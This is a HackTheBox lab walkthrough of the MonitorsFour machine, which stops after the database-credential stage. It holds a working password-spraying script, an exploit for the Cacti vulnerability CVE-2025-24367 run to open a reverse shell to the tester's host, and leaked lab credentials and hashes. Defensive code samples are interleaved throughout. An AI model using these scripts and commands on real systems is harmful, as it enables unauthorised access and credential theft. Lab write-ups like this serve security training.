
HackTheBox - MonitorsFour

MonitorsFour runs a website on which an API was discovered. The API exposed user credentials, which granted access to the site. Cacti was also found, affected by an RCE vulnerability. Password spraying was performed to obtain valid credentials, which allowed exploitation and access to a Docker container. The main site mentioned the Docker version, which was found to be vulnerable; after exploitation, privileged access to the host storage was obtained. Finally, a scheduled task was modified to obtain privileged access on the host.

Name: MonitorsFour
OS: Windows
Points: 20
Difficulty: Easy
Release date: 2025-12-06
IP: 10.129.100.42
Makers: TheCyberGeek, kavigihan

Rated: user-rated difficulty chart (Cake 211, VeryEasy 285, Easy 1520, TooEasy 1673, Medium 875, BitHard 346, Hard 239, TooHard 74, ExHard 32, BrainFuck 92)

Recon

nmap

nmap shows the open ports http (80) and WinRM (5985).

# Nmap 7.95 scan initiated Sat Dec  6 20:42:07 2025 as: /usr/lib/nmap/nmap --privileged -p80,5985 -sV -sC -oN nmap_scan 10.129.45.249
Nmap scan report for 10.129.45.249
Host is up (0.069s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
|_http-title: Did not follow redirect to http://monitorsfour.htb/
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  6 20:42:19 2025 -- 1 IP address (1 host up) scanned in 12.00 seconds

Web Site

The website redirects to the domain monitorsfour.htb, which we add to the /etc/hosts file.

❯ curl -sI 10.129.45.249
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sun, 07 Dec 2025 02:42:49 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
Location: http://monitorsfour.htb/

The site describes networking services.

image

There is a login form.

image

Directory Brute Forcing

feroxbuster reveals static content, views, and administrator-related content.

❯ feroxbuster -u http://monitorsfour.htb/ -w $CM -x php
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://monitorsfour.htb/
 🚩  In-Scope Url          │ monitorsfour.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        7l        9w      146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        7l       11w      146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        5l       30w     1616c http://monitorsfour.htb/static/images/services/01.png
200      GET        1l      235w    12063c http://monitorsfour.htb/static/images/review.svg
200      GET       71l      130w     1872c http://monitorsfour.htb/static/js/custom.js
200      GET        5l      369w    21003c http://monitorsfour.htb/static/js/popper.min.js
200      GET       24l       99w      770c http://monitorsfour.htb/static/js/smoothscroll.js
200      GET      109l      619w    13655c http://monitorsfour.htb/static/images/service.svg
200      GET       19l       62w     3695c http://monitorsfour.htb/static/images/services/04.png
200      GET        6l       34w     2166c http://monitorsfour.htb/static/images/services/02.png
200      GET       96l      239w     4340c http://monitorsfour.htb/login
200      GET       11l       15w      188c http://monitorsfour.htb/static/css/plugins.css
200      GET        9l       43w     3028c http://monitorsfour.htb/static/images/services/03.png
200      GET       38l      117w     2813c http://monitorsfour.htb/static/js/plugins.js
200      GET        4l     1293w    86709c http://monitorsfour.htb/static/js/jquery-min.js
200      GET        7l      683w    60010c http://monitorsfour.htb/static/js/bootstrap.min.js
200      GET        1l      393w    15974c http://monitorsfour.htb/static/images/about-us.svg
200      GET      935l     1752w    15174c http://monitorsfour.htb/static/css/style.css
200      GET        1l      359w    22207c http://monitorsfour.htb/static/images/banner.svg
200      GET      129l      673w    57007c http://monitorsfour.htb/static/admin/assets/images/logo.png
200      GET        7l      277w    44342c http://monitorsfour.htb/static/js/owl.carousel.min.js
200      GET       87l     1326w   157954c http://monitorsfour.htb/static/admin/assets/images/logo.ico
200      GET      338l      982w    13688c http://monitorsfour.htb/
301      GET        7l       11w      162c http://monitorsfour.htb/controllers => http://monitorsfour.htb/controllers/
200      GET        4l       35w      367c http://monitorsfour.htb/contact
200      GET        2l      210w    12507c http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/pace.min.js
200      GET      607l     1130w    16986c http://monitorsfour.htb/static/admin/assets/js/core/app.js
200      GET        7l      430w    36816c http://monitorsfour.htb/static/admin/assets/js/core/libraries/bootstrap.min.js
200      GET        6l      184w     9227c http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/blockui.min.js
200      GET        1l        1w    37820c http://monitorsfour.htb/static/admin/assets/css/minified/colors.min.css
200      GET     1190l     1226w    47483c http://monitorsfour.htb/static/admin/assets/css/icons/icomoon/styles.css
200      GET        4l     1305w    84345c http://monitorsfour.htb/static/admin/assets/js/core/libraries/jquery.min.js
200      GET        1l     1430w   108349c http://monitorsfour.htb/static/admin/assets/css/minified/core.min.css
200      GET        1l     5059w   256503c http://monitorsfour.htb/static/admin/assets/css/minified/components.min.css
200      GET        1l     1733w   122310c http://monitorsfour.htb/static/admin/assets/css/minified/bootstrap.min.css
200      GET       84l      212w     3099c http://monitorsfour.htb/forgot-password
200      GET     4734l    29110w  2364586c http://monitorsfour.htb/static/admin/assets/images/servers.png
301      GET        7l       11w      162c http://monitorsfour.htb/static => http://monitorsfour.htb/static/
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin => http://monitorsfour.htb/static/admin/
200      GET        1l        3w       35c http://monitorsfour.htb/user
301      GET        7l       11w      162c http://monitorsfour.htb/views => http://monitorsfour.htb/views/
301      GET        7l       11w      162c http://monitorsfour.htb/views/admin => http://monitorsfour.htb/views/admin/
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin/assets => http://monitorsfour.htb/static/admin/assets/
301      GET        7l       11w      162c http://monitorsfour.htb/static/css => http://monitorsfour.htb/static/css/
200      GET      215l      592w     9229c http://monitorsfour.htb/views/admin/api.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/fonts => http://monitorsfour.htb/static/fonts/
200      GET      197l      537w     8471c http://monitorsfour.htb/views/admin/changelog.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/images => http://monitorsfour.htb/static/images/
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin/assets/css => http://monitorsfour.htb/static/admin/assets/css/
200      GET      221l      580w     9491c http://monitorsfour.htb/views/admin/customers.php
200      GET      653l     1652w    28212c http://monitorsfour.htb/views/admin/dashboard.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/js => http://monitorsfour.htb/static/js/
200      GET       84l      212w     3099c http://monitorsfour.htb/views/forgot_password.php
200      GET       20l       36w      302c http://monitorsfour.htb/views/admin/footer.php
200      GET      338l      982w    13688c http://monitorsfour.htb/views/index.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/images/blog => http://monitorsfour.htb/static/images/blog/
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin/assets/images => http://monitorsfour.htb/static/admin/assets/images/
200      GET       96l      239w     4340c http://monitorsfour.htb/views/login.php
200      GET      415l     1069w    19023c http://monitorsfour.htb/views/admin/invoices.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin/assets/js => http://monitorsfour.htb/static/admin/assets/js/
301      GET        7l       11w      162c http://monitorsfour.htb/static/admin/assets/swf => http://monitorsfour.htb/static/admin/assets/swf/
200      GET      217l      573w     9317c http://monitorsfour.htb/views/admin/tasks.php
200      GET      321l      800w    13987c http://monitorsfour.htb/views/admin/users.php
301      GET        7l       11w      162c http://monitorsfour.htb/static/images/services => http://monitorsfour.htb/static/images/services/

Views

The views (views/*) do not appear to be protected and render the content of the different pages, exposing administrator functionality.

image
image

The HTML source of api.php contains a link to an API endpoint.

<ul class="dropdown-menu dropdown-menu-right">
  <li><a href="/api/v1/logout"><i class="icon-switch2"></i> Logout</a></li>
</ul>

Subdomain Discovery

Running ffuf reveals the subdomain cacti.

❯ ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.monitorsfour.htb" -u http://monitorsfour.htb -fl 8

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://monitorsfour.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt
 :: Header           : Host: FUZZ.monitorsfour.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response lines: 8
________________________________________________

cacti                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]

API - Website

ffuf reveals several endpoints.

❯ ffuf -w $CM -u http://monitorsfour.htb/api/v1/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://monitorsfour.htb/api/v1/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.htpasswd               [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 153ms]
.hta                    [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 155ms]
.htaccess               [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 156ms]
auth                    [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
logout                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 406ms]
users                   [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 237ms]
user                    [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 302ms]
:: Progress: [4614/4614] :: Job [1/1] :: 40 req/sec :: Duration: [0:01:03] :: Errors: 0 ::

/users requires a valid token.

❯ curl 'http://monitorsfour.htb/api/v1/users'
{"error":"Invalid or missing token"}

Supplying the value 0 as the token returns every user together with their information.

❯ curl -s 'http://monitorsfour.htb/api/v1/users?token=0' | jq
[
  {
    "id": 2,
    "username": "admin",
    "email": "admin@monitorsfour.htb",
    "password": "56b32eb43e6f15395f6c46c1c9e1cd36",
    "role": "super user",
    "token": "8024b78f83f102da4f",
    "name": "Marcus Higgins",
    "position": "System Administrator",
    "dob": "1978-04-26",
    "start_date": "2021-01-12",
    "salary": "320800.00"
  },
  {
    "id": 5,
    "username": "mwatson",
    "email": "mwatson@monitorsfour.htb",
    "password": "69196959c16b26ef00b77d82cf6eb169",
    "role": "user",
    "token": "0e543210987654321",
    "name": "Michael Watson",
    "position": "Website Administrator",
    "dob": "1985-02-15",
    "start_date": "2021-05-11",
    "salary": "75000.00"
  },
  {
    "id": 6,
    "username": "janderson",
    "email": "janderson@monitorsfour.htb",
    "password": "2a22dcf99190c322d974c8df5ba3256b",
    "role": "user",
    "token": "0e999999999999999",
    "name": "Jennifer Anderson",
    "position": "Network Engineer",
    "dob": "1990-07-16",
    "start_date": "2021-06-20",
    "salary": "68000.00"
  },
  {
    "id": 7,
    "username": "dthompson",
    "email": "dthompson@monitorsfour.htb",
    "password": "8d4a7e7fd08555133e056d9aacb1e519",
    "role": "user",
    "token": "0e111111111111111",
    "name": "David Thompson",
    "position": "Database Manager",
    "dob": "1982-11-23",
    "start_date": "2022-09-15",
    "salary": "83000.00"
  }
]
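Two defects are visible in that response: a token value of 0 is accepted, and the endpoint serialises password hashes, API tokens and salaries. The page does not show the server-side code, so the following Python is an added illustration written for this writeup, not the application's code. `loose_token_match` is a hypothetical reconstruction of a numeric-coercing comparison (tokens such as `0e543210987654321` parse as the number 0, so `0` compares equal); `strict_token_match` and `public_view` show the hardened check and the field filtering. The user records are constructed samples modelled on the fields above.

```python
import hmac
import json
from typing import Callable, Optional

# Constructed sample records modelled on the API's fields (not the real data).
USERS = [
    {"id": 2, "username": "admin", "email": "admin@example.test",
     "password": "<md5-hash-placeholder>", "role": "super user",
     "token": "8024b78f83f102da4f", "salary": "320800.00", "dob": "1978-04-26"},
    {"id": 5, "username": "mwatson", "email": "mwatson@example.test",
     "password": "<md5-hash-placeholder>", "role": "user",
     "token": "0e543210987654321", "salary": "75000.00", "dob": "1985-02-15"},
]

# Fields that must never leave the server in a listing response
SENSITIVE_FIELDS = {"password", "token", "salary", "dob"}


def loose_token_match(supplied: str, stored: str) -> bool:
    """Hypothetical reconstruction (assumption, not the app's code): compare as numbers
    when both sides parse as numbers. '0e543210987654321' becomes 0.0, so '0' matches."""
    try:
        return float(supplied) == float(stored)
    except ValueError:
        return supplied == stored


def strict_token_match(supplied: str, stored: str) -> bool:
    """Exact byte-for-byte comparison in constant time; empty values never match."""
    if not supplied or not stored:
        return False
    return hmac.compare_digest(supplied.encode(), stored.encode())


def lookup_user(token: str, matcher: Callable[[str, str], bool]) -> Optional[dict]:
    """Return the record whose token matches under the given comparison, else None."""
    for user in USERS:
        if matcher(token, user["token"]):
            return user
    return None


def public_view(user: dict) -> dict:
    """Strip secrets and sensitive personal data before serialising a record."""
    return {k: v for k, v in user.items() if k not in SENSITIVE_FIELDS}


def api_users(token: str, strict: bool = True) -> str:
    """Simulated /api/v1/users handler: authenticate the caller's token, then list users.

    strict=False uses the hypothetical loose comparison to reproduce the observed
    behaviour; strict=True is the hardened version."""
    matcher = strict_token_match if strict else loose_token_match
    if lookup_user(token, matcher) is None:
        return json.dumps({"error": "Invalid or missing token"})
    return json.dumps([public_view(u) for u in USERS])


if __name__ == "__main__":
    print("loose, token=0 :", api_users("0", strict=False))
    print("strict, token=0:", api_users("0"))
    print("strict, real   :", api_users("8024b78f83f102da4f"))
```

Even with the strict comparison, a list endpoint should still apply `public_view`; authentication and output filtering are separate controls, and the response above failed both.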

We build a wordlist from the usernames.

❯ curl -s "http://monitorsfour.htb/user?token=0" | jq '[.[] |  .username]'
[
  "admin",
  "mwatson",
  "janderson",
  "dthompson"
]
❯ python usernames.py names.txt >> users.txt
❯ wc -l users.txt
44 users.txt

Crack The Hash

We extract only the hashes.

❯ curl -s "http://monitorsfour.htb/user?token=0" | jq '[.[] |  .password]'
[
  "56b32eb43e6f15395f6c46c1c9e1cd36",
  "69196959c16b26ef00b77d82cf6eb169",
  "2a22dcf99190c322d974c8df5ba3256b",
  "8d4a7e7fd08555133e056d9aacb1e519",
  "9e8694e99216221dad8f6fd183904504"
]

crackstation recovers the value behind the administrator's hash.

Hash                              | Type    | Result
56b32eb43e6f15395f6c46c1c9e1cd36  | md5     | wonderful1
69196959c16b26ef00b77d82cf6eb169  | Unknown | Not found
2a22dcf99190c322d974c8df5ba3256b  | Unknown | Not found
8d4a7e7fd08555133e056d9aacb1e519  | Unknown | Not found
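The application stores unsalted MD5 digests, which is why a single lookup recovers the password. As an added example (not code from the writeup or the application), the following Python shows how such a users table is migrated without a forced reset: a login against a legacy MD5 record is verified and immediately rehashed with salted PBKDF2-HMAC-SHA256. The record, the sample password and the storage format `pbkdf2$<iterations>$<salt>$<hash>` are all constructed for the example.

```python
import hashlib
import hmac
import os
import re
from typing import Optional

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")
PBKDF2_ITERATIONS = 600_000  # constructed choice for the example; tune to the CPU budget

# Constructed legacy record standing in for a users row (password is NOT one from the page)
LEGACY_RECORD = {"username": "demo", "password": hashlib.md5(b"constructed-pass").hexdigest()}


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, serialised as 'pbkdf2$<iters>$<salt_hex>$<hash_hex>'."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password: str, stored: str) -> bool:
    """Verify against the serialised format; malformed strings simply fail."""
    try:
        scheme, iters, salt_hex, hash_hex = stored.split("$")
        if scheme != "pbkdf2":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
        return hmac.compare_digest(dk.hex(), hash_hex)
    except ValueError:
        return False


def verify_and_upgrade(record: dict, password: str) -> bool:
    """Verify a login; if the row still holds an unsalted MD5 digest, rehash it on success.

    `record` is a mutable dict with a 'password' key, standing in for the database row;
    the caller would persist it after a True result."""
    stored = record["password"]
    if MD5_HEX.match(stored):
        # Legacy path: constant-time compare the MD5 digest, then replace it for good
        digest = hashlib.md5(password.encode()).hexdigest()
        if not hmac.compare_digest(digest, stored):
            return False
        record["password"] = hash_password(password)
        return True
    return verify_pbkdf2(password, stored)


if __name__ == "__main__":
    print("before:", LEGACY_RECORD["password"])
    print("login ok:", verify_and_upgrade(LEGACY_RECORD, "constructed-pass"))
    print("after: ", LEGACY_RECORD["password"])
```

Records that never log in again keep their MD5 digest, so a migration like this is paired with an expiry on remaining legacy rows; the API exposure above is what turned the weak hashing into an actual credential leak.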

Admin

The credentials grant access to the dashboard.

image

We see that it is possible to generate a token for the API.

image

There is a changelog listing the changes made in each version. It mentions a patched vulnerability and the version Docker Desktop 4.44.2.

Version | Date | Title | Change | Description
V.1.9 | June 2, 2025 | API User Integration | API | Integrated API user management with token-based authentication, enabling external systems to automate tasks such as retrieving user data, managing resources, and interacting with the platform securely.
V.1.8 | June 1, 2025 | API Key Management | API | Implemented secure API key generation and updated the user interface to allow managing API keys. Users can now create keys for programmatic access while maintaining control through the admin dashboard.
V.1.7 | May 16, 2025 | Infrastructure Notice | Infrastructure | Migrated MonitorsFour infrastructure to Windows and Docker Desktop 4.44.2, enabling containerized deployments for improved portability, scalability, and easier environment management.
V.1.6 | May 1, 2025 | Security Notice: SQL Injection Patch | Security | Patched an error-based SQL injection vulnerability in the forgotten password form by enforcing secure prepared state stricter input validation.
V.1.5 | March 1, 2025 | User Enhancements | Users | Added functionality to allow Super Users to create, update, and delete user accounts directly from the user management interface.
V.1.4 | February 1, 2024 | User Management | Users | Created the users section to display all current users of the web app. Features include role management, user status monitoring, and detailed user activity logs.
V.1.3 | January 1, 2024 | Customer Management | Customers | Developed the customers section to handle all customer-related information. Features include the ability to add new customers, edit existing profiles, and remove customers from the database.
V.1.2 | December 1, 2023 | Invoice Tracking | Invoices | Introduced the ability to create and manage invoices. Included features for tracking payment status, due dates, and automatic reminders.
V.1.1 | November 1, 2023 | Order Management | Tasks | Added functionality to create, update, and monitor tasks related to customer orders. Enhanced the workflow with real-time updates and notifications.
V.1.0 | October 1, 2023 | Initial release | Dashboard | Initial setup of the dashboard for real-time monitoring and data visualization. Included basic traffic sources, sales statistics, and quick stats.

Cacti

The cacti subdomain shows version 1.2.28. We find that this version is affected by CVE-2025-24367, which allows creating files that lead to remote command execution (RCE), although it requires authenticated access to Cacti.

image

Password Spraying

We use a Python script to perform password spraying with the known usernames against the Cacti login.

❯ cat cacti_login.py
import requests
from bs4 import BeautifulSoup

# Cacti login form; requests are routed through the local intercepting proxy
login_url = "http://cacti.monitorsfour.htb/cacti/index.php"
proxies = {'http': 'http://127.0.0.1:8080'}

USER = 'users.txt'        # one candidate username per line
PASSWORD = 'wonderful1'   # single password sprayed across every user

with open(USER, "r") as f:
    for user in f:
        user = user.strip()
        if not user:
            continue
        session = requests.Session()
        # Fetch the login page first: Cacti embeds a per-session CSRF token in the form
        get_page = session.get(login_url, proxies=proxies, timeout=10)
        soup = BeautifulSoup(get_page.text, "html.parser")
        csrf_field = soup.find("input", {"name": "__csrf_magic"})
        if csrf_field is None:
            raise SystemExit("CSRF token not found on the login page")
        csrf_token = csrf_field["value"]

        data = {
            "__csrf_magic": csrf_token,
            "action": "login",
            "login_username": user,
            "login_password": PASSWORD
        }
        post_response = session.post(login_url, data=data, proxies=proxies, timeout=10)

        # Cacti answers a failed login with an "Access Denied" message
        if 'Denied' not in post_response.text:
            print(f"Login as: {user}:{PASSWORD}")
            break

A valid pair of credentials was identified.

❯ python cacti_login.py
Login as: marcus:wonderful1
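From the defender's side, a spray like the one above is characteristic: one source address fails against many distinct accounts in a short window, while each individual account stays below any lockout threshold. The following Python is an added detection example written for this writeup, not part of Cacti or the original post. The log lines are constructed in a simple key=value format (not Cacti's real `user_log` layout), and the window and threshold are assumptions to be tuned per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample authentication events (format invented for this example)
SAMPLE_LOG = """\
2025-12-06T22:41:01Z src=10.10.14.26 user=admin result=fail
2025-12-06T22:41:02Z src=10.10.14.26 user=mwatson result=fail
2025-12-06T22:41:02Z src=10.10.14.26 user=janderson result=fail
2025-12-06T22:41:03Z src=10.10.14.26 user=dthompson result=fail
2025-12-06T22:41:03Z src=10.10.14.26 user=marcus result=success
2025-12-06T22:50:00Z src=10.0.0.5 user=marcus result=fail
2025-12-06T22:50:05Z src=10.0.0.5 user=marcus result=fail
2025-12-06T22:50:09Z src=10.0.0.5 user=marcus result=success
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)


def parse_events(text):
    """Parse log text into (timestamp, source, username, result) tuples; skip junk lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["src"], m["user"], m["result"]))
    return events


def detect_spraying(events, window=timedelta(minutes=5), min_users=3):
    """Return {source: [usernames]} for sources that failed against at least
    `min_users` distinct accounts inside a sliding `window`.

    Counting distinct usernames per source (rather than failures per user) is what
    separates a spray from an ordinary user mistyping their own password."""
    recent = defaultdict(deque)   # source -> deque of (timestamp, user) failures
    alerts = {}
    for ts, src, user, result in sorted(events):
        if result != "fail":
            continue
        q = recent[src]
        q.append((ts, user))
        while q and ts - q[0][0] > window:   # drop failures outside the window
            q.popleft()
        users = {u for _, u in q}
        if len(users) >= min_users and src not in alerts:
            alerts[src] = sorted(users)      # record the first trigger for this source
    return alerts


if __name__ == "__main__":
    for src, users in detect_spraying(parse_events(SAMPLE_LOG)).items():
        print(f"possible password spraying from {src}: {', '.join(users)}")
```

The second source in the sample (10.0.0.5) fails twice against a single account and is not flagged; only the multi-account pattern raises an alert. In Cacti the same events are in the `user_log` table seen later in this writeup, which is the natural place to run such a query.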

User - www-data (Docker)

CVE-2025-24367

We clone the CVE-2025-24367-Cacti-PoC repository, which hosts the exploit for the vulnerability mentioned above.

❯ git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git
Cloning into 'CVE-2025-24367-Cacti-PoC'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), 5.35 KiB | 5.35 MiB/s, done.
cd CVE-2025-24367-Cacti-PoC
❯ ll
.rw-rw-r-- kali kali 8.3 KB Sat Dec  6 22:58:27 2025  exploit.py
.rw-rw-r-- kali kali 1.6 KB Sat Dec  6 22:58:27 2025  README.md

The -h flag lists the values required for exploitation.

❯ python exploit.py -h
usage: CVE-2025-24367 - Cacti Authenticated Graph Template RCE [-h] -u USER -p PASSWORD -i IP -l PORT -url URL [--proxy]

options:
  -h, --help            show this help message and exit
  -u, --user USER       Username for login
  -p, --password PASSWORD
                        Password for login
  -i, --ip IP           IP address for reverse shell
  -l, --port PORT       Port number for reverse shell
  -url, --url URL       Base URL of the application
  --proxy               Enable proxy usage (default: http://127.0.0.1:8080)

The exploit was run with our IP and listening port for a reverse shell.

❯ python exploit.py -url http://cacti.monitorsfour.htb -u marcus -p wonderful1 -i 10.10.14.26 -l 1335 --proxy
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: Xp3i2.php
[+] Got payload: /bash
[i] Created PHP filename: ZgsJh.php
[+] Hit timeout, looks good for shell, check your listener!
[+] Stopped HTTP server on port 80

Shell

With that we obtained a shell as www-data.

❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.26] from monitorsfour.htb [10.129.45.249] 61427
bash: cannot set terminal process group (9): Inappropriate ioctl for device
bash: no job control in this shell
www-data@821fbd6a43fa:~/html/cacti$ whoami;id;pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/cacti
www-data@821fbd6a43fa:~/html/cacti$

config.php defines the variables for Cacti's database connection.

www-data@821fbd6a43fa:~/html/cacti$ cat include/config.php
cat include/config.php
<?php
/*
 +-------------------------------------------------------------------------+
 | Copyright (C) 2004-2024 The Cacti Group                                 |
 |                                                                         |
 | This program is free software; you can redistribute it and/or           |
 | modify it under the terms of the GNU General Public License             |
 | as published by the Free Software Foundation; either version 2          |
 | of the License, or (at your option) any later version.                  |
 |                                                                         |
 | This program is distributed in the hope that it will be useful,         |
 | but WITHOUT ANY WARRANTY; without even the implied warranty of          |
 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the           |
 | GNU General Public License for more details.                            |
 +-------------------------------------------------------------------------+
 | Cacti: The Complete RRDtool-based Graphing Solution                     |
 +-------------------------------------------------------------------------+
 | This code is designed, written, and maintained by the Cacti Group. See  |
 | about.php and/or the AUTHORS file for specific developer information.   |
 +-------------------------------------------------------------------------+
 | http://www.cacti.net/                                                   |
 +-------------------------------------------------------------------------+
*/

/**
 * Make sure these values reflect your actual database/host/user/password
 */

$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'mariadb';
$database_username = 'cactidbuser';
$database_password = '7pyrf6ly8qx4';
$database_port     = '3306';
$database_retries  = 5;
$database_ssl      = false;
$database_ssl_key  = '';
$database_ssl_cert = '';
$database_ssl_ca   = '';
$database_persist  = false;

# [.. cut ..]

In the filesystem root we find the .dockerenv file, which indicates that Cacti runs inside a Docker container, as stated in the changelog.

www-data@821fbd6a43fa:~/html/cacti$ ls -lah /
total 7.4M
drwxr-xr-x   1 root root 4.0K Dec  7 04:51 .
drwxr-xr-x   1 root root 4.0K Dec  7 04:51 ..
-rwxr-xr-x   1 root root    0 Nov 10 17:04 .dockerenv
lrwxrwxrwx   1 root root    7 Aug 24 16:20 bin -> usr/bin
drwxr-xr-x   2 root root 4.0K Aug 24 16:20 boot
drwxr-xr-x   5 root root  340 Dec  6 22:32 dev
drwxr-xr-x   1 root root 4.0K Nov 10 17:04 etc
drwxr-xr-x   1 root root 4.0K Nov 10 16:15 home
lrwxrwxrwx   1 root root    7 Aug 24 16:20 lib -> usr/lib
lrwxrwxrwx   1 root root    9 Aug 24 16:20 lib64 -> usr/lib64
drwxr-xr-x   2 root root 4.0K Nov  3 20:44 media
drwxr-xr-x   2 root root 4.0K Nov  3 20:44 mnt
drwxr-xr-x   2 root root 4.0K Nov  3 20:44 opt
dr-xr-xr-x 191 root root    0 Dec  6 22:32 proc
drwx------   2 root root 4.0K Nov  3 20:44 root
drwxr-xr-x   1 root root 4.0K Nov 10 17:05 run
lrwxrwxrwx   1 root root    8 Aug 24 16:20 sbin -> usr/sbin
drwxr-xr-x   2 root root 4.0K Nov  3 20:44 srv
-rwxr-xr-x   1 root root  113 Sep 13 06:13 start.sh
dr-xr-xr-x  13 root root    0 Dec  7 05:03 sys
drwxrwxrwt   1 root root 7.3M Dec  7 05:00 tmp
drwxr-xr-x   1 root root 4.0K Nov  3 20:44 usr
drwxr-xr-x   1 root root 4.0K Nov  4 04:06 var
www-data@821fbd6a43fa:~/html/cacti$

We also find the source code of the application served on the main domain, together with its database credentials.

www-data@821fbd6a43fa:~$ ls -lah app
total 36K
drwxr-xr-x 1 www-data www-data 4.0K Oct 30 08:12 .
drwxr-xr-x 1 root     root     4.0K Nov 10 17:01 ..
-rwxr-xr-x 1 www-data www-data   97 Sep 13 05:37 .env
-rwxr-xr-x 1 www-data www-data 2.9K Sep 13 05:31 Router.php
drwxr-xr-x 1 www-data www-data 4.0K Nov 10 17:01 controllers
-rwxr-xr-x 1 www-data www-data 2.3K Sep 13 05:31 index.php
drwxr-xr-x 1 www-data www-data 4.0K Oct 30 08:12 static
drwxr-xr-x 1 www-data www-data 4.0K Oct 30 08:12 views
www-data@821fbd6a43fa:~$ cd app
www-data@821fbd6a43fa:~/app$ cat .env
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
www-data@821fbd6a43fa:~/app$

The database holds the user information previously observed through the API.

